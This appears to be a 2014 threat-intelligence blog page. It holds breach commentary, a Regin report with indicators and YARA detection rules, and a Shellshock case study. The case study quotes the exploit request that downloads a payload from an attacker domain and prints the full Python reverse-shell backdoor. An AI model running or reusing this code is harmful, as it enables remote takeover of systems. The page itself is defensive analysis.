Sony fell victim yet again to a large scale breach.
http://www.csoonline.com/article/2852982/data-breach/sales-contracts-and-other-data-published-by-sonys-attackers.html?utm_source=twitterfeed&utm_medium=twitter
And why do I post this in the Wapack Labs blog? Nearly all of the open source lists are buzzing with this right now, but I've not seen anything in the local sphere, so here's the deal folks...
Holidays are upon us. You need to know this.. no retailer will be safe from theft. Sony spent an enormous amount of money, recruiting top talent and diving deep into security after the first breach (Playstation) a couple of years ago.
When you swipe your card, or when you watch a customer in your store swipe a card, there's a strong probability that somewhere along the value chain between swipe to processor all the way back to the bank that issued it, and the network that it's carried on, are going to have vulnerabilities that will allow it to be stolen.
Here's what you do about it...
Pay attention. Watch your bill. The fraudsters usually hit you with small charges (<$20). Call your card company immediately.
One of my favorite sites is the Federal Trade Commission's educational site. I went to school with the guy that leads the cyber education effort... there are some great (and short) education pieces here for consumers and companies alike.
From the consumer perspective? Try this.
Business? Try this.
I should mention... it's not always your fault... when security vendors fail to do the work, but they still pass on the 'trusted seal', both businesses and consumers end up with the short end of the stick. In one case, a noted security company attested to the fact that a site was secure, when in fact it wasn't..
Realizing education takes time, and most people don't like to read, if you've got a concern, and you're a business in the area, give us a call. We're here to help and we can both answer your questions, and monitor your network for bad things that may be happening. Doing your best to make sure you keep your customers information (payment information, private information, etc.) safe, is a massive responsibility --but it is just that -- a responsibility.
Enjoy the read. Give us a call if you need help!
Jeff
Sunday, November 30, 2014
Friday, November 28, 2014
11/28/14: Wapack Labs Priority Intelligence Report: Regin
This is a slimmed down version of a couple of white papers, describing new espionage focused malware known as Regin. There's been a ton of activity on this in the security circles, but not really in any form that could be read by folks without a security team who can digest and use the information. And while we're not as interested in knowing who wrote it, we do want to make sure folks have tools to help identify and protect against it.
Wapack Labs has not analyzed any malware, rather publishes this to ensure background is known and current mitigations are published in a simple form. Yara rules are shown at the end of this three page priority intelligence report. And as always, sources are shown. Please feel free to download the full papers from Kaspersky and/or Symantec for deeper analysis.
Wapack Labs has not analyzed any malware, rather publishes this to ensure background is known and current mitigations are published in a simple form. Yara rules are shown at the end of this three page priority intelligence report. And as always, sources are shown. Please feel free to download the full papers from Kaspersky and/or Symantec for deeper analysis.
-Jeff
-------------------------------------------------------------------------------------------------------------------------
Regin
Wapack
Labs Priority Intelligence Report
Publication date: 28 November 2014; information
cutoff date: 26 November 2014
Handling requirements: Traffic light protocol (TLP) WHITE.
TLP: WHITE information may be distributed
without restriction, subject to copyright controls.
Background
A new dangerous piece of malware has emerged,
and nearly all are talking about attribution, pointing to government-sponsored
authorship from the UK and US. Wapack Labs has not evaluated linkages to any
government, but thought it necessary to identify any mitigations that might be
available for this new, highly complex piece of code. This report is a
situation report, based on what we (Wapack Labs) currently know. The lab has not yet obtained samples of the
malware, thus, have not performed this analysis directly. This report is a
compilation of what others have reported, and is only meant as a means of
outlining the first steps in mitigation/defense.
Executive
Summary
Regin
is a multi-purpose family of malware that has been observed in the wild since
at least 2008. It is unknown exactly
when the first samples appeared; however, compilation timestamps have been
observed dating back to 2003. Regin is
extremely modular across its multistage infection process and has a wide range
of standard capabilities. The malware is
capable of installing a large number of payloads, some of which are highly
customized for the targeted system.
Details
Regin
is reportedly a complex piece of software designed with espionage in mind. Regin is said to steal passwords, monitor
network traffic, and gather information on processes and memory utilization
using a multi-phased approach and ‘modules’ of code that are dropped into a
system independently of each other to avoid detection and defenses. Regin modules have been observed parsing mail
from Microsoft Exchange email databases, scanning for deleted files on an
infected computer and retrieving them, and collecting administration traffic
for telecommunications (cellular - GSM) base station controllers.
Regin
employs several techniques to obfuscate exactly what information has been
exfiltrated. Targeting is reported to
include telecom operators, government institutions, multinational political
bodies, financial institutions, research institutions, and individuals involved
in advanced mathematical and cryptographic research. The level of customization found in Regin
samples indicates a high level of specialist knowledge in the targeted sectors. It is reported that actors utilizing the
Regin malware have been focused to date on two main objectives - intelligence
gathering and facilitating additional sophisticated attacks.
Reportings
of Regin operations have been noted in Algeria, Afghanistan, Austria, Belgium,
Brazil, Fiji, Germany, Iran, India, Indonesia, Ireland, Kiribati, Malaysia,
Mexico, Pakistan, Russia, Saudi Arabia, and Syria.
 |
| Figure 1: Regin Geographic Distribution |
Mitigations
For
the defender, four command and control nodes have been identified. Users are recommended to monitor in/outbound
network activity for command and control on the following Internet Protocol
(IP) addresses:
·
61.67.114.73 Taiwan, Taichung - Chwbn
·
202.71.144.113 India, Chetput - Chennai Network Operations
·
203.199.89.80 India, Thane - Internet Service Provider
·
194.183.237.145 Belgium, Brussels - Perceval S.a.
Several
unique strings have been identified in Regin modules so far. While these
strings may not be indicative of Regin activity, each should be monitored. False positives, however, are highly
likely. Users without the capability to
perform host based scanning may perform searches of their computers for the
following terms. If identified, without
legitimate use, contact your security team, system administrator or Wapack Labs for assistance.
·
legspinv2.6
·
LEGSPINv2.6
·
WILLISCHECKv2.0
·
HOPSCOTCH
·
U_STARBUCKS
·
shit
The following Yara[1]
rules have been provided by Kaspersky Labs, and have not been tested by Wapack
Labs.
rule apt_regin_vfs {
meta:
copyright = "Kaspersky Lab"
description = "Rule to detect Regin
VFSes"
strings:
$a1={00 02 00 08 00 08 03 F6 D7 F3 52}
$a2={00 10 F0 FF F0 FF 11 C7 7F E8 52}
$a3={00 04 00 10 00 10 03 C2 D3 1C 93}
$a4={00 04 00 10 C8 00 04 C8 93 06 D8}
condition:
($a1 at 0) or ($a2 at 0) or ($a3 at 0) or
($a4 at 0)
}
rule apt_regin_dispatcher_disp_dll {
meta:
copyright = "Kaspersky Lab"
description = "Rule to detect Regin
disp.dll dispatcher"
strings:
$mz="MZ"
$string1="shit"
$string2="disp.dll"
$string3="255.255.255.255"
$string4="StackWalk64"
$string5="imagehlp.dll"
condition:
($mz at 0) and (all of ($string*))
}
rule apt_regin_2013_64bit_stage1 {
meta:
copyright = "Kaspersky Lab"
description = "Rule to detect Regin 64
bit stage 1 loaders"
filename="wshnetc.dll"
md5="bddf5afbea2d0eed77f2ad4e9a4f044d"
filename="wsharp.dll"
md5="c053a0a3f1edcbbfc9b51bc640e808ce"
strings:
$mz="MZ"
$a1="PRIVHEAD"
$a2="\\\\.\\PhysicalDrive%d"
$a3="ZwDeviceIoControlFile"
condition:
($mz at 0) and (all of ($a*)) and filesize
< 100000
}
rule apt_regin_2011_32bit_stage1 {
meta:
copyright = "Kaspersky Lab"
description = "Rule to detect Regin 32
bit stage 1 loaders"
strings:
$key1={331015EA261D38A7}
$key2={9145A98BA37617DE}
$key3={EF745F23AA67243D}
$mz="MZ"
condition:
($mz at 0) and any of ($key*) and filesize
< 300000
}
rule apt_regin_rc5key {
meta:
copyright = "Kaspersky Lab"
description = "Rule to detect Regin
RC5 decryption keys"
strings:
$key1={73 23 1F 43 93 E1 9F 2F 99 0C 17 81
5C FF B4 01}
$key2={10 19 53 2A 11 ED A3 74 3F C3 72 3F
9D 94 3D 78}
condition:
any of ($key*)
}
Open source
white papers:
https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/regin-analysis.pdf
About Wapack Labs
Wapack Labs, located in the
technology mills of Manchester, NH is a Cyber Threat Analysis and Intelligence
organization supporting the Red Sky Alliance, the FS-ISAC, and individual
organizations by offering expert level targeted intelligence analysis answering
some of the hardest questions in Cyber. Wapack Labs’ engineers, researchers,
and analysts design and deliver transformational cyber-security analysis tools
that fuse open source and proprietary information, using deep analysis
techniques and visualization. Information derived from these tools and
techniques serve as the foundation of Wapack Labs’ information reporting to the
cyber-security teams of its customers and industry partners located around the
world.
For questions or comments regarding
this report, please contact the lab directly by at 603-606-1246, or feedback@wapacklabs.com.
[1] YARA is a tool aimed at
(but not limited to) helping malware researchers to identify and classify
malware samples. With YARA you can create descriptions of malware families (or
whatever you want to describe) based on textual or binary patterns. Each description,
a.k.a rule, consists of a set of strings and a boolean expression which
determine its logic. (http://plusvic.github.io/yara/)
Monday, November 24, 2014
Check your video folks!
Twice in one week... a Russian website that offers a view into as many as 73,000 webcam/video systems out there with default passwords set, and now this one discovered by Rapid7 offering another 150,000.
I used to average about 72 investigations every quarter. At least one had to do with default passwords set on video security systems. One, earned me a free trip (business of course) to Brazil to find out who'd been logging into the IP Cameras in the US. Turned out to be a sales engineer using default passwords.
Here's the deal folks... video systems have servers at the heart of the security system... those servers are computer systems designed to capture video, but nonetheless, they are simply computers. Other systems use servers too --badging for example. If you swipe, carry an RFID, or punch in a code that records accesses, guess what? The data is stored on a server.
So do yourself a favor. Make sure the security systems (physical security systems) have the default password changed. Default passwords are often times overlooked, and it's one of the simplest things you can do to keep yourself secure.
 |
| http://www.bbc.com/news/technology-30121159 |
I used to average about 72 investigations every quarter. At least one had to do with default passwords set on video security systems. One, earned me a free trip (business of course) to Brazil to find out who'd been logging into the IP Cameras in the US. Turned out to be a sales engineer using default passwords.
Here's the deal folks... video systems have servers at the heart of the security system... those servers are computer systems designed to capture video, but nonetheless, they are simply computers. Other systems use servers too --badging for example. If you swipe, carry an RFID, or punch in a code that records accesses, guess what? The data is stored on a server.
So do yourself a favor. Make sure the security systems (physical security systems) have the default password changed. Default passwords are often times overlooked, and it's one of the simplest things you can do to keep yourself secure.
Saturday, October 11, 2014
Shellshock and FAQ
At least three times every week I get asked by someone "What's the difference between Wapack Labs and Red Sky Alliance?" "Who is your target customer?" "What product do we deliver?" "What's your distribution look like?"
So let's start here...
Wapack Labs is an intelligence, research and analysis company. We sell information.
- Wapack Labs authors sources and sells intelligence, research and analysis. We deliver it in many forms, to many places... Red Sky Alliance/Beadwindow, the FS-ISAC, Subscriptions, OEM, Threat Recon, etc. We publish in PDF, STIX, HTML, CSV, and JSON.
Red Sky Alliance is a crowdsourcing platform for cyber threat intelligence pro's. Discussions are deep, and at the end of the thread, they receive a finished report with analysis of the discussion.
- Security researchers go to Red Sky Alliance to share notes, build the story, and together, protect their networks. What happens in Red Sky Alliance, stays in Red Sky Alliance. It's private. There's no government involvement. We don't care how you interact with DSS, the regulators, or any other government organization --that's your choice. Red Sky Alliance exists to help improve your security. The private portal is ALWAYS busy. We've added university users, and just this week, another Icelandic bank.
- For government security researchers we offer a second collaborative... Beadwindow --delivered in Threat Connect. They do not get access to the Red Sky private portal, but they do get information that they may care about. We've delivered cyber warnings, dumped credential caches and targeting, to several government agencies directly, and for others, we push stuff through Beadwindow to contacts at the 24th AF and the US MDA. None of the US Cyber Centers participate, so if you're a state, local or .gov who needs help, call us. We can help. And our stuff is UNCLASSIFIED! You can actually use it!
As an example of one of our reports, I've posted (below) a snippet from a Wapack Labs report to Red Sky Alliance members and Wapack Labs subscribers...
We published this report in it's entirety last week.
We took a bit of a different approach on what seemed to be the hottest topic of the last two weeks - Shellshock. (Need information on Shellshock? Try here.)
We're looking for use cases where we might help protect against. This is one of three case studies that we'd identified, taking advantage of Shellshock.
You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it's gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.
So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;)
You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it's gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.
So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;)
SHELLSHOCK CASE STUDY AND
INFRASTRUCTURE
Beginning on 24 September 2014,
hackers and researchers began exploiting the widely publicized Shellshock bash
vulnerability, described in CVE -2014-6271.
The majority of the initial activity involved mass vulnerability
scanning by white hats and black hats alike. Examination of scanning activity
showed a peak on September 27th with a sharp decline as of September29th .
This spike and sudden decrease may be a result of what is likely wide-scale
patching of the vulnerability. Alternatively, this may mark the end of
exploiting the vulnerability for reconnaissance purposes and could signal a
move up the kill-chain into more targeted operations.
Legacy
Scamming infrastructure re-emerges with Shellshock
A recently observed instance of Shellshock in the
wild took the form of a Python implemented backdoor hosted on google-traffic-analytics.com. Table 5 lists the observed originating IPs along with the Shellshock request:
Originating
IPs
|
Shellshock Request
|
14.163.12.119
77.29.189.34
78.15.20.81
78.161.195.166
79.136.130.110
88.253.229.151
93.139.212.67
109.227.100.189
112.156.18.40
113.171.116.163
117.218.186.16
118.172.123.111
119.130.114.154
124.123.75.68
178.120.175.81
178.121.79.68
190.49.241.220
190.82.114.190
223.206.54.26
|
() { :;}; /bin/bash -c '/usr/bin/env curl -s
http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x
/tm
|
!/usr/bin/env
python
from
socket import *
import
os
from
time import sleep
import
sys
fpid =
os.fork()
if
fpid!=0:
host='stats.google-traffic-analytics.com'
port=9091
sockobj = None
############################################
sockobj = None
recv = False
def connect():
try:
sockobj=socket(AF_INET,SOCK_STREAM)
sockobj.connect((host,port))
return sockobj
except:
return False
while True:
while not sockobj:
sockobj = connect()
print "[*] Trying to
reconnect..."
sleep(1)
if sockobj:
recv = sockobj.recv(1024)
#print recv
if not recv: sockobj = False; break;
cmd = recv.strip()
res = os.popen(cmd).read()
if res:
sockobj.sendall(res)
|
Legacy Whois Record
|
Current Record
|
Registrant
Contact:
Goga Gastoyan
Goga Gastoyan Goga Gastoyan
bash@blogbuddy.ru
+7.4957452002 fax: +7.4957452002
Pokryshkina d.36 kv.36
Moscow Moscow 119602
ru
|
Admin
Name: Radovanka Janekovic
Admin
Organization: Goga Gastoyan
Admin
Street: Ljubljanska 6
Admin
City: Bled
Admin
State/Province: Bled
Admin
Postal Code: 4260
Admin
Country: SI
Admin
Phone: +386.15765749
Admin
Phone Ext:
Admin
Fax: +386.15765749
Admin
Fax Ext:
Admin
Email: support@google-traffic-analytics.com
|
Table
5. google-traffic-analytics.com Scanning Nodes
Upon successful exploitation, a CURL request is made for http://google-traffic-analytics.com/cl.py. The Python script (cl.py) is a simple yet
effective Backdoor that works on both Linux and Windows. It also has a zero
detection on Virus Total [1].
The configured C2 address is hosted on subdomain stats.google-traffic-analytics.com. The downloaded python script will attempt
connection C2 on port 9091 and if the C2 is listening - a shell is opened up to the victim.
During testing, a the C2 node issued a uname –a command which prints all
available information about a Linux system [2]. [Comment: No additional activity was observed.] (See Mitigations section for a SNORT signature)
The
re-emergence of this domain after an apparent four year hiatus begs the
question of whether it belongs to the same attackers. A Whois history report
from Domain Tools lists the registrant during 2010 as “Goga Gastoyan”, (bash@blogbuddy.ru),
however this changed in 2013 to the current owner “Radovanka Janekovic”. Further inspection of
the records revealed Goga Gastoyan as the Admin organization in the new record – thus confirming likely
attribution to the same attackers. With
the connection made to the legacy infrastructure, one could assume that this latest activity involving Shellshock could be the most recent
attempt to expand the spamming network.
Table
6. Whois Record Comparison
[1]
https://www.virustotal.com/en/file/052421011162421c7fbe1c9613e37b520a494034901dab1c6ee192466090421d/analysis/
[2]
http://linux.about.com/library/cmd/blcmdl1_uname.htm
[3] http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html
------------------------------------------------------
I realize this is pretty technical, but I thought it important to offer a simple slice of some of the work we do. This report is the basis for nearly everything else. These reports, when complete are farmed for placement in Threat Recon. This information, sourced by the lab, is thought to be high confidence (although we never score anything perfect!).
This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.
Have a great weekend!
Jeff
This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.
Have a great weekend!
Jeff
Subscribe to:
Posts (Atom)